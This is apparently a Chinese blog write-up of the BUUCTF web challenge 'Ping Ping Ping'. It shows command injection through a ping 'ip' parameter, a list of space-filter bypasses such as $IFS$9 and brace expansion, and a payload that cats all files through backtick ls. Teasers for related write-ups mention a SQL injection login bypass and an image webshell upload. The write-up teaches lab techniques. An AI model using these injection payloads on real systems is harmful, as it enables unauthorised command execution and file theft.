当前位置:首页 >CTF >BUU > 正文内容

BUUCTF_web_第九题:[GXYCTF2019]Ping Ping Ping

BUU七星1个月前 (01-21)


是个ping, 传入/?ip=127.0.0.1看看

命令执行, 立刻想到||管道符:

/?ip=127.0.0.1||ls

不行, 那就封号;

/?ip=127.0.0.1;ls

成功获得两个文件名

flag.php

index.php

然后cat flag.php试试
提示空格被过滤了
那就绕过,空格绕过的方法如下:
  • $IFS
  • ${IFS}
  • $IFS$1 //$1改成$加其他数字貌似都行
  • <
  • <>
  • {cat,flag.php} //用逗号实现了空格功能
  • %20
  • %09
试了一下, 发现他过滤了flag字符串,,,,那就看看index.php喽
?ip=127.0.0.1;cat$IFS$1index.php
得到:

分析一下:

对flag过滤非常严格, 那就不用flag了,在linux中, 可以把ls的结果,作为cat的参数,就不用flag了:

?ip=127.0.0.1;cat$IFS$9`ls`

但是源码里没有flag, 我寻思着不应该啊, 特意抓包看了一下, 他给我写到注释里了, f12就好了.

阿西吧


qixingbit.com|转载请声名出处|QQ:320406741

相关文章

BUUCTF_web_第13题:[RoarCTF 2019]Easy Calc

BUUCTF_web_第13题:[RoarCTF 2019]Easy Calc

打开题, 发现是个计算器,传入表达式,计算结果,乍一看没啥问题然后祖传的f12, 首先看到的就是一个祖传的注释:<!--I've set up WAF to ensure security.--...

BUUCTF_web_第11题:[护网杯 2018]easy_tornado

BUUCTF_web_第11题:[护网杯 2018]easy_tornado

开靶场, 有三个文件链接,依次点开, 有个提示:flag in /fllllllllllllag然后观察url发现,访问文件是需要提交一个filehash值的:/file?filename=/flag...

BUUCTF_web_第一题: [HCTF 2018]WarmUp

BUUCTF_web_第一题: [HCTF 2018]WarmUp

第一题: [HCTF 2018]WarmUp f12, 注释里有个文件, 访问, 成功获得审计代码. 审计代码里有个hint.php, 打开, 成功获得ffffllllaaaagggg,...

BUUCTF_web_第四题:[极客大挑战 2019]Havefun

BUUCTF_web_第四题:[极客大挑战 2019]Havefun

开局一直猫, flag全靠f12:<!--˂!----˃$cat=$_GET['cat'];echo $cat;if($cat=='dog'){    echo 'Syc{c...

BUUCTF_web_第16题:[极客大挑战 2019]Upload

BUUCTF_web_第16题:[极客大挑战 2019]Upload

上传图片, 很自然想到图片马, 那就传个:然后发现提示:NO! HACKER! your file included '<?'过滤了<?那就是试试php语言的另一种写法:接着提示:Don'...

BUUCTF_web_第八题:[极客大挑战 2019]LoveSQL

BUUCTF_web_第八题:[极客大挑战 2019]LoveSQL

打开之后, 和之前的类似, 万能密码 1' or 1=1#登录成功,给了一个admin和一串md5, md5解密失败.只能常规注入了.给了个灵魂试探:用 sqlmap 是没有灵魂的那就手工注入一下,巩...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。